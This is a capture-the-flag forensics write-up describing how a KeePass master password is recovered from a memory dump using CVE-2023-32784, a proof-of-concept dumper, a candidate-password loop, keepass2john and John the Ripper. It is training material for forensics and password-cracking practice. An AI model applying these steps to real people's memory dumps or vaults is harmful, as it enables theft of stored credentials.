team-logo
Published on

Forensic - Keepass password recovery

Authors

Scenario - KeePass Memory Dump Exploit – CVE-2023-32784

We were provided with:

  • A memory dump
  • A KeePass database file (.kdbx)

Our goal: Extract the master password and retrieve the flag from the KeePass database.

Tools Used

  • keepass-password-dumper – PoC tool for CVE-2023-32784
  • keepass2john + John the Ripper – to brute-force the password
  • KeePass – to open the database and view entries

Step-by-Step

1. Dumping the Password from Memory

I used the tool keepass-password-dumper to analyze the memory dump:

dotnet run  memdump.bin

This revealed a partial password, missing the first character.

Screenshot: Part of a password

2. Generating Possible Passwords

I generated a wordlist by prepending all printable characters (e.g., A–Z, a–z, 0–9, symbols) to the recovered partial password:

for c in {a..z} {A..Z} {0..9}; do
    echo "$c<partial_password>" >> passwords.txt
done

Then converted the KeePass database to a hash format:

keepass2john database.kdbx > hash.txt

Cracked it with:

john --wordlist=passwords.txt hash.txt

John successfully cracked the full password.

3. Opening the Database and Retrieving the Flag

I opened the KeePass database using the recovered master password.

Inside, we found an entry titled "Junior Crypto 2025" with a congratulatory message in the notes and the flag in password.

Screenshot: KeePass Flag Entry

Result

✅ Password recovered via memory dump
✅ KeePass database unlocked
✅ Flag retrieved from entry

Notes

  • This attack is based on CVE-2023-32784
  • Exploits plaintext remnants of the KeePass master password in RAM
  • Requires only memory access – no elevated privileges or active KeePass session needed